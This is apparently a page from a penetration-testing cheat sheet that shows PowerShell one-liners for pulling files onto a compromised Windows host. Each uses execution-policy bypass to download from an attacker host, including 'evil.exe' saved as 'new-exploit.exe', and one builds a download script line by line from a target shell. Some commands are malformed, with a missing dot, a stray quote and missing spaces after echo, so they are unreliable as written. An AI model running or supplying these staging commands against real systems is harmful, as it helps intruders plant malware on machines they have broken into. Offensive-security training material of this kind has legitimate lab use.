Powershell

Powershell option: 2006 and later versions

One-liners

powershell.exe -nop -ep bypass -c "iwr -uri http://10.10.10.10:8000/file.txt -outfile file.txt"                    

or:

#Remember to specify port and correct $path where you want your file uploaded 
#serve with Python or Apache
powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient)DownloadFile('http://10.10.10.10:8000/file.txt','C:\Windows\Temp\file.txt')""

1)From target shell echo the powershell command into a wget.ps1 file

#change the $url parameter accordingly

echo$webclient = New-Object System.Net.WebClient >>wget.ps1
echo$url = "http://10.10.10.10/evil.exe" >>wget.ps1
echo$file = "new-exploit.exe" >>wget.ps1
echo$webclient.DownloadFile($url,$file) >>wget.ps1

2)Change the execution policy of wget.ps1 script

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#-ExecutionPolicy Bypass
#-NoLogo hides the PowerShell logo banner
#-NonInteractive suppresses the interactive PowerShell prompt

3)One liner option | shorter syntax

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/evil.exe', 'new-exploit.exe')

PreviousVBScript Nextpyftpdlib

Last updated 2 years ago